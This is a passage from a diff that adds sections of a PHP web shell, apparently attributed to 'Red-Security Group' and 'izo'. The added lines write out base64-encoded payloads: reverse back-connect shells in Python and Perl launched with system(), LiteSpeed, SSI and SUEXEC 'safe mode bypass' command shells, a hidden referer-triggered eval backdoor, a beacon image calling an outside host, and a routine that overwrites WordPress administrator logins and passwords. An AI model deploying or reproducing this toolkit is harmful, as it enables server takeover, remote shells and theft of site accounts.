+NDogCglwcmludCAiZXJyb3I7IGhlbHA6IGhlYWQgLW4gMTYgZDAwci5weSIKCXN5cy5leGl0KDEp
+CmVsaWYgYXJndlsxXT09Ii1iIjogCglQVz1hcmd2WzJdCglQT1JUPWFyZ3ZbM10KZWxpZiBhcmd2
+WzFdPT0iLXIiIGFuZCBsZW4oYXJndik+NDoKCVBXPWFyZ3ZbMl0KCVBPUlQ9YXJndlszXQoJSE9T
+VD1hcmd2WzRdCmVsc2U6IGV4aXQoMSkKClBPUlQ9aW50KFBPUlQpCnByaW50ICJQVzoiLFBXLCJQ
+T1JUOiIsUE9SVCwiSE9TVDoiLEhPU1QKCQojc3lzLmFyZ3ZbMF09ImQwMHIiCgojIGV4aXQgZmF0
+aGVyIHByb2MKaWYgb3MuZm9yaygpIT0wOiAKCXN5cy5leGl0KDApCgojIGFzc29jaWF0ZSB0aGUg
+c29ja2V0CnNvY2s9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RS
+RUFNKQpzb2NrLnNldHRpbWVvdXQoVElNRV9PVVQpCgppZiBhcmd2WzFdPT0iLWIiOgoJc29jay5i
+aW5kKCgnbG9jYWxob3N0JywgUE9SVCkpCglzb2NrLmxpc3RlbigwKQoKcnVuPVRydWUKd2hpbGUg
+cnVuOgoKCWlmIGFyZ3ZbMV09PSItciI6CgkJdHJ5OiBzb2NrLmNvbm5lY3QoIChIT1NULCBQT1JU
+KSApCgkJZXhjZXB0OiAKCQkJcHJpbnQgImhvc3QgdW5yZWFjaGFibGUiCgkJCXRpbWUuc2xlZXAo
+NSkKCQllbHNlOiBydW49YWN0aW9uKHNvY2spCgllbHNlOgkJCgkJdHJ5OgkoY29ubixhZGRyKT1z
+b2NrLmFjY2VwdCgpCgkJZXhjZXB0OiAKCQkJcHJpbnQgInRpbWVvdXQiCgkJCXRpbWUuc2xlZXAo
+MSkKCQllbHNlOiBydW49YWN0aW9uKGNvbm4pCQkJCgkKCSMgc2h1dGRvd24gdGhlIHNva2NldAoJ
+aWYgYXJndlsxXT09Ii1iIjogY29ubi5zaHV0ZG93bigyKQoJZWxzZToKCQl0cnk6IHNvY2suc2Vu
+ZCgiIikKCQlleGNlcHQ6IHRpbWUuc2xlZXAoMSkKCQllbHNlOiBzb2NrLnNodXRkb3duKDIp';
+
+$file = fopen("priv9" ,"w+");
+$write = fwrite ($file ,base64_decode($bizci));
+fclose($file);
+if ($write) {
+echo "The File Was Created Successfuly";
+}
+else {echo"\"error\"";}
+chmod("priv9" , 0777);
+$fips=$_SERVER["REMOTE_ADDR"];
+$bports="22";
+system("./priv9 -r izo $bports $fips");
+break;
+case "PHP_18":
+� � mkdir('litespeed', 0755);
+� � � � chdir('litespeed');
+$izo = 'PHRpdGxlPkxpdGVTcGVlZCBXZWIgQnlwYXNzIC0gaXpvY2luIHByaXY5PC90aXRsZT4KICAgICAg
+ICA8Zm9udCBmYWNlPSJXaW5nZGluZ3MiPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly9wcml2
+OC5pYmxvZ2dlci5vcmcvcy5waHA/Jys8P2VjaG8gInVuYW1lIC1hIDogIjsgZWNobyAocGhwX3Vu
+YW1lKCkpPz4iOyIgd2lkdGg9IjAiIGhlaWdodD0iMCI+PC9hPjwvZm9udD4KPC9mb250Pgo8Ym9k
+eSBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIHJpZ2h0bWFy
+Z2luPSIwIiBib3R0b21tYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwMCIgbWFyZ2luaGVpZ2h0PSIw
+Ij4KCgombmJzcDs8cCBhbGlnbj0iY2VudGVyIj4KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9w
+Pgo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVGFob21h
+Ij5SZWQtU2VjdXJpdHkgR3JvdXA8L2ZvbnQ+PC9iPjwvcD4KPHAgYWxpZ249ImNlbnRlciI+Jm5i
+c3A7PC9wPgo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiIHNpemU9IjQiIGNv
+bG9yPSJncmVlbiI+PGI+TGl0ZVNwZWVkIAo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+U2FmZSBNb2Rl
+IEJ5cGFzc2VyPC9mb250PiA8L2I+PC9mb250Pgo8L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNw
+OzwvcD4KPGZvcm0gbmFtZT0iejFkLWxpdGVzcGVlZCIgIG1ldGhvZD0icG9zdCI+CjxwIGFsaWdu
+PSJjZW50ZXIiPjxmb250IGZhY2U9IlRhaG9tYSI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiM8
+L2ZvbnQ+IDwvYj5Db21tYW5kPGI+CjxzcGFuIGxhbmc9ImFyLXNhIj48Zm9udCBjb2xvcj0iI0ZG
+MDAwMCI+fjwvZm9udD4gPC9zcGFuPiZuYnNwOzwvYj48aW5wdXQgbmFtZT0iY29tbWFuZCIgdmFs
+dWU9ImlkIiBzdHlsZT0iYm9yZGVyOiAxcHggZG90dGVkICNGRjAwMDA7IGZvbnQtZmFtaWx5OnRh
+IiBzaXplPSIzNiIgdGFiaW5kZXg9IjIwIj48Yj4KPC9iPiZuYnNwOyA8L2ZvbnQ+PC9wPgo8cCBh
+bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBu
+YW1lPSJTdWJtaXQiIHZhbHVlPSJCYXMgRGF5aSI+PGI+CjwvYj48L2ZvbnQ+PC9wPgo8L2Zvcm0+
+Cjxicj48YnI+PGJyPjxicj48Y2VudGVyPgo8P3BocAokY29tbWFuZCA9ICRfUE9TVFsnY29tbWFu
+ZCddOwokejAweiA9ICRfUE9TVFsnejAweiddOwppZigkY29tbWFuZCl7CiR6MTFkID0gIjxjZW50
+ZXI+PHByZT48cHJlPgo8YnI+ClJlZHNlY3VyaXR5LmlibG9nZ2VyLm9yZwo8YnI+Cjxicj4KPCEt
+LSNleGVjIGNtZD0nJGNvbW1hbmQnIC0tPiAKCiI7CiRvcGVuZmlsZSA9IGZvcGVuKCJpem8uc2h0
+bWwiLCJ3Iik7CiR3cml0ZWludG8gPSBmd3JpdGUoJG9wZW5maWxlLCIkejExZCIpOwpmY2xvc2Uo
+JG9wZW5maWxlKTsKaWYoJG9wZW5maWxlKXsKfWVsc2V7Cn0KfQpwYXJzZV9zdHIoJF9TRVJWRVJb
+J0hUVFBfUkVGRVJFUiddLCRhKTsgaWYocmVzZXQoJGEpPT0naXonICYmIGNvdW50KCRhKT09OSkg
+eyBlY2hvICc8c3Rhcj4nO2V2YWwoYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwg
+am9pbihhcnJheV9zbGljZSgkYSxjb3VudCgkYSktMykpKSkpO2VjaG8gJzwvc3Rhcj4nO30KPz4K
+PHByZT4gCiA8aWZyYW1lIHNyYz0naXpvLnNodG1sJyAgd2lkdGg9MTAwJSBoZWlnaHQ9ODUlIGlk
+PSJJMSIgbmFtZT0iSUYxIiA+CjwvcHJlPg==';
+
+$file = fopen("ssi.php" ,"w+");
+$write = fwrite ($file ,base64_decode($izo));
+fclose($file);
+
+� �echo "<iframe src=litespeed/ssi.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_19":
+� � mkdir('ssi', 0755);
+� � � � chdir('ssi');
+$fp = fopen(".htaccess","w+");
+fwrite($fp,"AddType text/html .shtml
+AddOutputFilter INCLUDES .shtml");
+
+$izo = 'PHRpdGxlPlNzaSBCeXBhc3MgMHpsZXlpY2kgU2hlbGwgMjAxMTwvdGl0bGU+CiAgICAgICAgPGZv
+bnQgZmFjZT0iV2luZ2RpbmdzIj48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vcHJpdjguaWJs
+b2dnZXIub3JnL3MucGhwPycrPD9lY2hvICJ1bmFtZSAtYSA6ICI7IGVjaG8gKHBocF91bmFtZSgp
+KT8+IjsiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvYT48L2ZvbnQ+CjwvZm9udD4KPGJvZHkgYmdj
+b2xvcj0iI0ZGRkZGRiIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiByaWdodG1hcmdpbj0i
+MCIgYm90dG9tbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMDAiIG1hcmdpbmhlaWdodD0iMCI+CgoK
+Jm5ic3A7PHAgYWxpZ249ImNlbnRlciI+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4KPHAg
+YWxpZ249ImNlbnRlciI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlRhaG9tYSI+UmVk
+LVNlY3VyaXR5IEdyb3VwPC9mb250PjwvYj48L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwv
+cD4KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVGFob21hIiBzaXplPSI0IiBjb2xvcj0i
+Z3JlZW4iPjxiPlNzaSAKPGZvbnQgY29sb3I9IiNGRjAwMDAiPlNhZmUgTW9kZSBCeXBhc3Nlcjwv
+Zm9udD4gPC9iPjwvZm9udD4KPC9wPgo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+Cjxmb3Jt
+IG5hbWU9InoxZC1saXRlc3BlZWQiICBtZXRob2Q9InBvc3QiPgo8cCBhbGlnbj0iY2VudGVyIj48
+Zm9udCBmYWNlPSJUYWhvbWEiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4jPC9mb250PiA8L2I+
+Q29tbWFuZDxiPgo8c3BhbiBsYW5nPSJhci1zYSI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPn48L2Zv
+bnQ+IDwvc3Bhbj4mbmJzcDs8L2I+PGlucHV0IG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJpZCIgc3R5
+bGU9ImJvcmRlcjogMXB4IGRvdHRlZCAjRkYwMDAwOyBmb250LWZhbWlseTp0YSIgc2l6ZT0iMzYi
+IHRhYmluZGV4PSIyMCI+PGI+CjwvYj4mbmJzcDsgPC9mb250PjwvcD4KPHAgYWxpZ249ImNlbnRl
+ciI+PGZvbnQgZmFjZT0iVGFob21hIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0
+IiB2YWx1ZT0iQmFzIERheWkiPjxiPgo8L2I+PC9mb250PjwvcD4KPC9mb3JtPgo8YnI+PGJyPjxi
+cj48YnI+PGNlbnRlcj4KPD9waHAKJGNvbW1hbmQgPSAkX1BPU1RbJ2NvbW1hbmQnXTsKJHowMHog
+PSAkX1BPU1RbJ3owMHonXTsKaWYoJGNvbW1hbmQpewokejExZCA9ICI8Y2VudGVyPjxwcmU+PHBy
+ZT4KPGJyPgpSZWRzZWN1cml0eS5pYmxvZ2dlci5vcmcKPGJyPgo8YnI+CjwhLS0jZXhlYyBjbWQ9
+JyRjb21tYW5kJyAtLT4gCgoiOwokb3BlbmZpbGUgPSBmb3BlbigiaXpvLnNodG1sIiwidyIpOwok
+d3JpdGVpbnRvID0gZndyaXRlKCRvcGVuZmlsZSwiJHoxMWQiKTsKZmNsb3NlKCRvcGVuZmlsZSk7
+CmlmKCRvcGVuZmlsZSl7Cn1lbHNlewp9Cn0KcGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVS
+RVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2l6JyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPHN0
+YXI+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlf
+c2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L3N0YXI+Jzt9Cj8+CjxwcmU+IAogPGlm
+cmFtZSBzcmM9J2l6by5zaHRtbCcgIHdpZHRoPTEwMCUgaGVpZ2h0PTg1JSBpZD0iSTEiIG5hbWU9
+IklGMSIgPgo8L3ByZT4=';
+
+$file = fopen("ssi.php" ,"w+");
+$write = fwrite ($file ,base64_decode($izo));
+fclose($file);
+
+� �echo "<iframe src=ssi/ssi.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_20":
+� � mkdir('suexec', 0777);
+� � � � chdir('suexec');
+
+$izodayi = 'PGh0bWw+IAo8Ym9keSBiZ2NvbG9yPSIwMDAwMDAwIj4gCjx0aXRsZT5zeW1saW5rPC90aXRsZT4g
+CjxjZW50ZXI+PGI+PGgyPjxmb250IGNvbG9yPSJyZWQiPiBTVUVYRSBCeXBhc3NlciBWaWEgU3lt
+bGluayAoViAxLjAxKTwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2gyPiAKPGNlbnRlcj48Yj48
+aDQ+PGZvbnQgY29sb3I9InJlZCI+V0lUSCBUSElTIFNDUklQVCBVIENBTiBVU0UgU1lNTElOSyBJ
+TiAyIE1FVEhPRHM8L2ZvbnQ+PC9icj48L2NlbnRlcj48L2I+PC9oND4gCjxjZW50ZXI+PGI+PGg0
+Pjxmb250IGNvbG9yPSJ3aGl0ZSI+RGVzdCA9IERlc3RlbmF0aW9uIE9mIFBhdGggb3IgZmlsZSBU
+aGF0IHUgV2FudCB0byBTeW1saW5rIEl0PC9mb250PjwvYnI+PC9jZW50ZXI+PC9iPjwvaDQ+IAo8
+Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPm5hbWUgOiBGaWxlIE5hbWUgVGhhdCB1
+IFdhbnQgVG8gY3JlYXRlIGluIChbcGF0aF0vc21sbmspPC9mb250PjwvYnI+PC9jZW50ZXI+PC9i
+PjwvaDQ+IAo8Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPlVwbG9hZCBUaGlzIFNj
+cmlwdCBJbiBGdWxsIFNVRVhFIG9yIEZ1bGxQZXJtIERpcmVjdG9yeTwvZm9udD48L2JyPjwvY2Vu
+dGVyPjwvYj48L2g0PiAKPGNlbnRlcj48Yj48aDQ+PGZvbnQgY29sb3I9IndoaXRlIj5Xcml0dGVu
+IEZvciAqTklYIFBsYXRmb3JtczwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2g0PiAKPC9odG1s
+PiAKCjw/cGhwIAovL0NPREVEIEJZIElSQU4gCi8vZm9ybSBkZWZpbmluZyAKcHJpbnQgIjxmb3Jt
+IG1ldGhvZD1wb3N0PiI7IApwcmludCAiPGNlbnRlcj48Zm9udCBjb2xvcj1ncmVlbj4iOyAKcHJp
+bnQgIjxiPmRlc3QgOjwvYj48aW5wdXQgc2l6ZT01MCBuYW1lPSdkZXN0ZW5hdGlvbicgdmFsdWU9
+Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8Yj5uYW1lIDo8L2I+PGlucHV0IHNpemU9NTAg
+bmFtZT0nbmFtZScgdmFsdWU9Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8aW5wdXQgdHlw
+ZT1zdWJtaXQgbmFtZT1fYWN0IHZhbHVlPSdDcmVhdGUhJz4iOyAKcHJpbnQgIjwvY2VudGVyPjwv
+Zm9udD4iOyAKJGRlc3QgPSAkX1BPU1RbJ2Rlc3RlbmF0aW9uJ107IAokZGVzdG5hbWUgPSAkX1BP
+U1RbJ25hbWUnXTsgCj8+IAoKPD9waHAgCi8vZGVmaW5pbmcgdmFyaWFibGVzIAokZGlyID0gZGly
+bmFtZSgkX1NFUlZFUltTQ1JJUFRfRklMRU5BTUVdKS4iL3NtbG5rIjsgCiRhY2MgPSAkZGlyLiIv
+Lmh0YWNlZXNzIjsgCiRjbWQgPSAibG4gLXMiLmNocigzMikuJGRlc3QuY2hyKDMyKS4kc3ltOyAK
+JHN5bSA9ICRkaXIuIi8iLiRkZXN0bmFtZTsgCiRodGFjY2VzcyA9ICAKIk9wdGlvbnMgK0ZvbGxv
+d1N5bUxpbmtzIi5jaHIoMDA5KS4gCiJEaXJlY3RvcnlJbmRleCBzZWVlcy5odG1sIi5jaHIoMDA5
+KS4gCiJSZW1vdmVIYW5kbGVyIC5waHAiLmNocigwMDkpLiAKIkFkZFR5cGUgYXBwbGljYXRpb24v
+b2N0ZXQtc3RyZWFtIC5waHAiOyAKCmlmICghZmlsZV9leGlzdHMoJGRpcikpIHsgCm1rZGlyICgk
+ZGlyKTsgCn0gIApzbGVlcCgxKTsgCmlmICghZmlsZV9leGlzdHMoJGFjYykpIHsgCiRoYW5kbGUg
+PSBmb3BlbiggIiRhY2MiICwgJ2ErJyApOyAKZnB1dHMoICRoYW5kbGUgLCAgIiRodGFjY2VzcyIg
+KTsgCn0gIAo/PiAKCjw/cGhwIAovL2NoZWNrIG1ldGhvZCAKaWYgKGZ1bmN0aW9uX2V4aXN0cyAo
+ZXhlYykgT1IgZnVuY3Rpb25fZXhpc3RzIChzaGVsbF9leGVjKSBPUiBmdW5jdGlvbl9leGlzdHMg
+KHN5c3RlbSkgT1IgZnVuY3Rpb25fZXhpc3RzIChwYXNzdGhydSkpIHsgCiRjaGVjayA9IDE7IAp9
+ZWxzZXsgCiRjaGVjayA9IDA7IAp9IAppZihmdW5jdGlvbl9leGlzdHMgKHN5bWxpbmspKSB7IAok
+Y2hlY2tzID0gMTsgCn1lbHNleyAKJGNoZWNrcyA9IDA7IAp9IAo/PiAKCjw/cGhwIAovL2RlZmlu
+ZSBjb21tYW5kIGZ1bmN0aW9uIAokcmVzYXVsdCA9ICcnOyAgCmZ1bmN0aW9uIGNvbW1hbmQoJGNt
+ZGUpIHsgCiAgICBpZiAoIWVtcHR5KCRjbWRlKSkgIAogeyAgCmlmIChmdW5jdGlvbl9leGlzdHMo
+J2V4ZWMnKSkgeyAkcmVzYXVsdCA9IEBleGVjKCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25f
+ZXhpc3RzKCdzaGVsbF9leGVjJykpIHsgJHJlc2F1bHQgPSBAc2hlbGxfZXhlYygkY21kZSk7IH0g
+IAplbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpIHsgJHJlc2F1bHQgPSBAc3lzdGVt
+KCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKSB7ICRyZXNh
+dWx0ID0gQHBhc3N0aHJ1KCRjbWRlKTsgfSAgCiB9IApyZXR1cm4gJHJlc2F1bHQ7IAp9IAo/PiAK
+Cjw/cGhwIAovL2V4ZWN1dGlvbiAKaWYgKCRjaGVjayA9PTEgJiYgJGNoZWNrcyA9PTEpeyBjb21t
+YW5kICgkY21kKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0xICYmICRjaGVja3MgPT0wKXsgY29tbWFu
+ZCAoJGNtZCk7IH0gCmVsc2VpZiAoJGNoZWNrID09MCAmJiAkY2hlY2tzID09MSkgeyBzeW1saW5r
+ICgkZGVzdCwkc3ltKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0wICYmICRjaGVja3MgPT0wKSAgCnsg
+IApwcmludCAoIjxjZW50ZXI+PGZvbnQgY29sb3I9Z3JlZW4+PGgxPnNjcmlwdCBkb2VzbnQgd29y
+ayBmb3IgdGhpcyBzZXJ2ZXI8L2ZvbnQ+PC9oMT48L2NlbnRlcj4iKTsgIAp9IAo/PiAKPD9waHAg
+Ci8vaXMgc2FmZSBtb2Qgb24gPyBzdGFydCAKaWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBz
+dHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgIAp7ICAKJHNhZmU9Ijxm
+b250IGNvbG9yPXJlZD5PTjwvZm9udD4iOyAKfSAgCmVsc2UgeyRzYWZlPSI8Zm9udCBjb2xvcj1n
+cmVlbj5PRkY8L2ZvbnQ+Ijt9IAplY2hvICI8Zm9udCBjb2xvcj13aGl0ZXB1cnBsZT5TQUZFIE1P
+RCBJUyA6PC9mb250PjxiPiRzYWZlPC9iPjxicj4iOyAKLy9vcGVuIHNhZmUgbW9kIGVuZC0tIAo/
+PiAgCjw/cGhwIAovL2Rpc2FibGUgZnVuY3Rpb24gc3RhcnQgCmVjaG8gIjxmb250IGNvbG9yPXdo
+aXRlcHVycGxlPkRpc2FibGUgZnVuY3Rpb25zIDo8L2ZvbnQ+IDxiPiI7IAppZignJz09KCRkZj1A
+aW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKSkpe2VjaG8gIjxmb250IGNvbG9yPWdyZWVuPk5P
+TkU8L2ZvbnQ+PC9iPiI7fWVsc2V7ZWNobyAiPGZvbnQgY29sb3I9cmVkPiRkZjwvZm9udD48L2I+
+Ijt9IAovL2Rpc2FibGUgZnVuY3Rpb24gZW5kLS0gCj8+';
+
+$file = fopen("suexec.php" ,"w+");
+$write = fwrite ($file ,base64_decode($izodayi));
+fclose($file);
+
+� �echo "<iframe src=suexec/suexec.php width=100% height=100%
+frameborder=0></iframe> ";
+break;
+case "PHP_21":
+# �coded by izo
+{
+print "Ba&#287;lan&#305;l&#305;yor...\n";
+$fippi=$_SERVER["REMOTE_ADDR"];
+$bpci="22";
+$izocinx = 'ICAgICMhL3Vzci9iaW4vcGVybAogICAgIAogICAgICAgIHVzZSBTb2NrZXQ7CiAgICAgICAgJGMw
+ZGUgPSAkQVJHVlswXTsKICAgICAgICAkYWFhYSA9ICRBUkdWWzFdOwogICAgICAgICAgaWYgKCEk
+QVJHVlswXSkgewogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xuIjsKICAgICAgICAgIHByaW50ZiAiIyMj
+IyMjU2ltcGxlIEJhY2sgQ29ubmVjdCBDb2RlZCBCeSBjMGRlLCBCSGFjayBtZW1iZXIjIyMjIyNc
+biI7CiAgICAgICAgICBwcmludGYgIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXG4iOwogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMj
+I1VzYWdlOiBJUCBQb3J0IHwgRXguIDEyNy4wLjAuMSA4ODg4IyMjIyMjIyMjIyMjI1xuIjsKICAg
+ICAKICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQogICAgICAgIHByaW50ICJDb25uZWN0aW5n
+IHRvICRjMGRlXG4iOwogICAgICAgICRiYWxjYW4gPSBnZXRwcm90b2J5bmFtZSgndGNwJyk7CiAg
+ICAgICAgc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRiYWxjYW4pIHx8IGRp
+ZSAoIkVycjByIHdoZW4gdHJ5aW5nIHRvIGNvbm5lY3QgIFtjaGVjayBJUDpQb3J0XSIpOwogICAg
+ICAgIGlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRhYWFhLCBpbmV0X2F0
+b24oJGMwZGUpKSkge2RpZSgiRXJyMHIgd2hlbiB0cnlpbmcgdG8gY29ubmVjdCAgW2NoZWNrIElQ
+OlBvcnRdICIpO30KICAgICAKICAgICAgICAgIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7CiAgICAg
+ICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsKICAgICAgICAgIG9wZW4oU1RERVJSLCI+JlNF
+UlZFUiIpOwogICAgICAgICAgZXhlYyB7Jy9iaW4vc2gnfSAnLWJhc2gnIC4gIlwwIiB4IDQ7';
+$file = fopen("dayi" ,"w+");
+$write = fwrite ($file ,base64_decode($izocinx));
+fclose($file);
+chmod("dayi" , 0777);
+system("perl dayi $fippi $bpci");
+}
+break;
+case "PHP_22":
+eval(base64_decode("aWYoZW1wdHkoJF9QT1NUWydwd2QnXSkpewplY2hvICI8Rk9STSBtZXRob2Q9XCJQT1NUXCI+Cmhv
+c3QgOiA8SU5QVVQgc2l6ZT1cIjE1XCIgdmFsdWU9XCJsb2NhbGhvc3RcIiBuYW1lPVwibG9jYWxo
+b3N0XCIgdHlwZT1cInRleHRcIj4KZGF0YWJhc2UgOiA8SU5QVVQgc2l6ZT1cIjE1XCIgdmFsdWU9
+XCJ3cC1cIiBuYW1lPVwiZGF0YWJhc2VcIiB0eXBlPVwidGV4dFwiPjxicj4KdXNlcm5hbWUgOiA8
+SU5QVVQgc2l6ZT1cIjE1XCIgdmFsdWU9XCJ3cC1cIiBuYW1lPVwidXNlcm5hbWVcIiB0eXBlPVwi
+dGV4dFwiPgpwYXNzd29yZCA6IDxJTlBVVCBzaXplPVwiMTVcIiB2YWx1ZT1cIioqXCIgbmFtZT1c
+InBhc3N3b3JkXCIgdHlwZT1cInBhc3N3b3JkXCI+PGJyPgogIDxicj4KU2V0IEEgTmV3IHVzZXJu
+YW1lIDQgTG9naW4gOiA8SU5QVVQgbmFtZT1cImFkbWluXCIgc2l6ZT1cIjE1XCIgdmFsdWU9XCJh
+ZG1pblwiPjxicj4KU2V0IEEgTmV3IHBhc3N3b3JkIDQgTG9naW4gOiA8SU5QVVQgbmFtZT1cInB3
+ZFwiIHNpemU9XCIxNVwiIHZhbHVlPVwiMTIzNDU2XCI+PGJyPgoKPElOUFVUIHZhbHVlPVwiY2hh
+bmdlXCIgbmFtZT1cInNlbmRcIiB0eXBlPVwic3VibWl0XCI+CjwvRk9STT4iOwp9ZWxzZXsKJGxv
+Y2FsaG9zdCA9ICRfUE9TVFsnbG9jYWxob3N0J107CiRkYXRhYmFzZSAgPSAkX1BPU1RbJ2RhdGFi
+YXNlJ107CiR1c2VybmFtZSAgPSAkX1BPU1RbJ3VzZXJuYW1lJ107CiRwYXNzd29yZCAgPSAkX1BP
+U1RbJ3Bhc3N3b3JkJ107CiRwd2QgICA9ICRfUE9TVFsncHdkJ107CiRhZG1pbiA9ICRfUE9TVFsn
+YWRtaW4nXTsKCgogQG15c3FsX2Nvbm5lY3QoJGxvY2FsaG9zdCwkdXNlcm5hbWUsJHBhc3N3b3Jk
+KSBvciBkaWUobXlzcWxfZXJyb3IoKSk7CiBAbXlzcWxfc2VsZWN0X2RiKCRkYXRhYmFzZSkgb3Ig
+ZGllKG15c3FsX2Vycm9yKCkpOwoKJGhhc2ggPSBjcnlwdCgkcHdkKTsKJGE0cz1AbXlzcWxfcXVl
+cnkoIlVQREFURSB3cF91c2VycyBTRVQgdXNlcl9sb2dpbiA9JyIuJGFkbWluLiInIFdIRVJFIElE
+ID0gMSIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsKJGE0cz1AbXlzcWxfcXVlcnkoIlVQREFURSB3
+cF91c2VycyBTRVQgdXNlcl9wYXNzID0nIi4kaGFzaC4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUo
+bXlzcWxfZXJyb3IoKSk7CiRhNHM9QG15c3FsX3F1ZXJ5KCJVUERBVEUgd3BfdXNlcnMgU0VUIHVz
+ZXJfbG9naW4gPSciLiRhZG1pbi4iJyBXSEVSRSBJRCA9IDIiKSBvciBkaWUobXlzcWxfZXJyb3Io
+KSk7CiRhNHM9QG15c3FsX3F1ZXJ5KCJVUERBVEUgd3BfdXNlcnMgU0VUIHVzZXJfcGFzcyA9JyIu
+JGhhc2guIicgV0hFUkUgSUQgPSAyIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOwokYTRzPUBteXNx
+bF9xdWVyeSgiVVBEQVRFIHdwX3VzZXJzIFNFVCB1c2VyX2xvZ2luID0nIi4kYWRtaW4uIicgV0hF
+UkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOwokYTRzPUBteXNxbF9xdWVyeSgiVVBE
+QVRFIHdwX3VzZXJzIFNFVCB1c2VyX3Bhc3MgPSciLiRoYXNoLiInIFdIRVJFIElEID0gMyIpIG9y
+IGRpZShteXNxbF9lcnJvcigpKTsKJGE0cz1AbXlzcWxfcXVlcnkoIlVQREFURSB3cF91c2VycyBT
+RVQgdXNlcl9lbWFpbCA9JyIuJFNRTC4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJy
+b3IoKSk7CgoKaWYoJGE0cyl7CmVjaG8gIjxiPiBTdWNjZXNzIDpOb3cgVXNlIEEgTmV3IFVzZXIg
+QW5kIFBhc3MgVG8gbG9naW4gSW4gVGhlIEFkbWluIFBhbmVsPC9iPiAiOwp9Cgp9"));
+break;
+case "PHP_23":
+eval(base64_decode("aWYoZW1wdHkoJF9QT1NUWydwd2QnXSkpewplY2hvICI8Rk9STSBtZXRob2Q9XCJQT1NUXCI+Cmhv
+c3QgOiA8SU5QVVQgc2l6ZT1cIjE1XCIgdmFsdWU9XCJsb2NhbGhvc3RcIiBuYW1lPVwibG9jYWxo
+b3N0XCIgdHlwZT1cInRleHRcIj4KZGF0YWJhc2UgOiA8SU5QVVQgc2l6ZT1cIjE1XCIgdmFsdWU9
+XCJkYXRhYmFzZVwiIG5hbWU9XCJkYXRhYmFzZVwiIHR5cGU9XCJ0ZXh0XCI+PGJyPgp1c2VybmFt
+ZSA6IDxJTlBVVCBzaXplPVwiMTVcIiB2YWx1ZT1cImRiX3VzZXJcIiBuYW1lPVwidXNlcm5hbWVc
+IiB0eXBlPVwidGV4dFwiPgpwYXNzd29yZCA6IDxJTlBVVCBzaXplPVwiMTVcIiB2YWx1ZT1cIioq
